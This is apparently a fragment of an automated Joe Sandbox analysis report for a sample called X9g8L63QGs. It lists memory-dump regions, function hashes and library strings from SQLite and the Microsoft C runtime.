                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CD103E2A1D69286DB268F38D098F796B95FF54784F4A8035DE8E43786EF2CE540C704
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c345bf4b26225235b4d26d45e61a1bfcc5d62a5fa2cd55c6cf9bacb0669c0dd
                                                                                                                                                                                                                                                                    • Instruction ID: 8fb0e1ad9e59c83323aaf0bbb50137441fa64e44e7299f0e8b2f989c749cb850
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c345bf4b26225235b4d26d45e61a1bfcc5d62a5fa2cd55c6cf9bacb0669c0dd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4313CB2609F8186EB608F71E8503E97361FB95754F44903AEA8E57BA9DF3CD548C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5c9d26001853adc99818a0497b1945147b5620d2729c7ee8dba9124f54c33512
                                                                                                                                                                                                                                                                    • Instruction ID: b85f2a7baa0ba5e643515a80f72213aa85457d5be719e4ba631ec002b8514fdf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c9d26001853adc99818a0497b1945147b5620d2729c7ee8dba9124f54c33512
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04315AB6609B8186EB608FA1E8547EE73A1FF84744F44407ADB4E47B98DF38C649C710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6b4f96484e9d25cd3f5e70dcb344116a910c5711d29953f1dc89c1487fb3fecb
                                                                                                                                                                                                                                                                    • Instruction ID: 47c185ab55784d4ec65e74d58b38b17c181ce7f81ecb7b74ba7d834f01fc2dc3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b4f96484e9d25cd3f5e70dcb344116a910c5711d29953f1dc89c1487fb3fecb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0314AB6609E81CAEB709F60F8543EA73A5FB84754F00903ADA4D47AA4DF3CD649C710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                    • Opcode ID: 41411a27d507602669186cf501f180bbbc9ffe95d56815b0de37bc952dd6e872
                                                                                                                                                                                                                                                                    • Instruction ID: c38681a6a6b498fc82b4cf02c5be1663efff621e19b63dc958a2d790cc661b11
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41411a27d507602669186cf501f180bbbc9ffe95d56815b0de37bc952dd6e872
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B314CB6609FC186EB708F60E9803AA6379FB84764F40417ADA4E57A95EF3CE5488710
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: You can only execute one statement at a time.$delete$insert$query string is too large$replace$the query contains a null character$update
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-1845899854
                                                                                                                                                                                                                                                                    • Opcode ID: 81f0315fdac4b158a46847c30f6c6da32f3beb1c5dcd7c36fb0fbca1c06307aa
                                                                                                                                                                                                                                                                    • Instruction ID: befa09f8aee252627494d2649b885278358fba08dace6cc9a98c407a34e39649
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f0315fdac4b158a46847c30f6c6da32f3beb1c5dcd7c36fb0fbca1c06307aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E517CE5B08B4286EE149F76E84897963A1FF84B90F4841B1DE5E47BA4EF3CE446C700
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                                                    • API String ID: 0-3733955532
                                                                                                                                                                                                                                                                    • Opcode ID: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
                                                                                                                                                                                                                                                                    • Instruction ID: 5f8d6c89447f2467c1ba53cb90b25ae50a32ceb0470267f30223c886d3835fe9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4828297cf84a1580d1be4d8346d77b2af936a330775195fb116fcdeafb873839
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00029CE1A4DB8285EA599B31E45CBB963A1FF85B81F484135DE5E077A1EF3CE508C308
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFB0C05B1C3
                                                                                                                                                                                                                                                                    • 00007FFB1C263010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFB0C05B2A4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-875588658
                                                                                                                                                                                                                                                                    • Opcode ID: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                                    • Instruction ID: fde7c398ef4605b5f975d0e996263224f7bd3953f91492619d397a7535785441
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f58605a80ece0dbe873986359c22506b80aa05e97296c1e5264f92375f5e100
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CE16EF2F086528BFB25CF74D458BBD37A0AF04748F444135DA4E66A99EF38A845C748
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFB0C0778F7, 00007FFB0C077973, 00007FFB0C077A81
                                                                                                                                                                                                                                                                    • cannot add a STORED column, xrefs: 00007FFB0C077A72
                                                                                                                                                                                                                                                                    • Cannot add a PRIMARY KEY column, xrefs: 00007FFB0C077881
                                                                                                                                                                                                                                                                    • Cannot add a column with non-constant default, xrefs: 00007FFB0C077969
                                                                                                                                                                                                                                                                    • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFB0C07790F
                                                                                                                                                                                                                                                                    • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFB0C077C5C
                                                                                                                                                                                                                                                                    • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFB0C077B14
                                                                                                                                                                                                                                                                    • Cannot add a UNIQUE column, xrefs: 00007FFB0C07789C
                                                                                                                                                                                                                                                                    • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFB0C0778ED
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-200680935
                                                                                                                                                                                                                                                                    • Opcode ID: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                                    • Instruction ID: 1f3181db8793ffac6fad5e85c5f5e5c6591ddfc7c0efae05483cabd4956e60f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b4710b465af85f28d42b2c529d5cd9f71a28c578942a5c84c3729e8c5c3be64
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AE1B0E1A09B8285EB6A8B39D148B7923A1FF44BC4F648235DE8D07795EF3CE455C708
                                                                                                                                                                                                                                                                    APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 4223619315-393685449
• Opcode ID: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
• Instruction ID: fa7fb75d62b7b4ebdd1d0df13c432006271b1b1c6cd371580c2319c06b64b1c9
• Opcode Fuzzy Hash: 6da6cceb144a245c76afb91d09171081a696858682c4f12eaced2770b517540e
• Instruction Fuzzy Hash: 97D14FE2A08B4187EB20ABB5D4493EE67A2FB467A8F300135DE4D57755DF38E891C780
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+
• String ID:
• API String ID: 2943138195-0
• Opcode ID: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
• Instruction ID: 43c7f1a651a8bdf71d147bdc26858b45025d6ebf886c8e09b8baee745e5e17d5
• Opcode Fuzzy Hash: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
• Instruction Fuzzy Hash: AE7149F2B54A42AAEB10EF74D4541ED23B2AB05B9CB904431DE0D57B99EF38DA19C3D0
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID:
• String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
• API String ID: 0-3207858774
• Opcode ID: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
• Instruction ID: 21f95a551f79e368d2a4021ed11e50ab3ced67fecd41bbfd0027d7713ff42324
• Opcode Fuzzy Hash: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
• Instruction Fuzzy Hash: F281ADE2B08E868AFB10AF34D5582F923A2AB55B64F645132DE4D03795DF3CE946C390
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: Name::operator+
• String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
• API String ID: 2943138195-1464470183
• Opcode ID: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
• Instruction ID: 8e6988c52f786e2bec4e648838aa27d8f4edd40a3b11ac3f2d20a2bde2a8fb1b
• Opcode Fuzzy Hash: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
• Instruction Fuzzy Hash: E0514DE1F18E628AEB10FB74E8485ED2772BB06364F640035DE0D57B98DF68E955C780
APIs
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: e017fc91d69bddb9aae330796ab311efe2c6512c7b4295912f4e83d96bc88404
• Instruction ID: 952d2c21f5f4bbb41483aea067b41e872e086a53fd06919717b55bbe5ee7795e
• Opcode Fuzzy Hash: e017fc91d69bddb9aae330796ab311efe2c6512c7b4295912f4e83d96bc88404
• Instruction Fuzzy Hash: 3981B0F1E0C28787FA54AB76D459EB926D1AF45B80F4840B5DA0C473E6DF7CE8568B00
APIs
Memory Dump Source
• Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
• Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 8f3bb3efd0dc3dc77f511d6591a1c1719394010db589a06ea761acdf96903b58
• Instruction ID: cfbb10fe3126f1148c559b81d2f2176fdc6120e20b7c48e0bd93523359cc5504
• Opcode Fuzzy Hash: 8f3bb3efd0dc3dc77f511d6591a1c1719394010db589a06ea761acdf96903b58
• Instruction Fuzzy Hash: 3B816AA9E08E42C6F671AB75F44137B62D2FF857A0F54E035D92C52AB6DE2CF8468600
APIs
Memory Dump Source
• Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
• Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                                                                    • Opcode ID: ebbc11ed6d4e2b153bf3b51c5f0c9a30cc048fc894ebc4ddcddd757e94eb54ba
                                                                                                                                                                                                                                                                    • Instruction ID: 66cb7cb02361b29f9eae1c642b68e93770d181a7344dd1ab956563e7f869aa6a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebbc11ed6d4e2b153bf3b51c5f0c9a30cc048fc894ebc4ddcddd757e94eb54ba
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B781A0A9E09EC346F670AB75D6C427B56BBAF417A0F0481B7DA0C63293DE2CF8458210
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFB1D5B0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716097392.00007FFB1D5B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
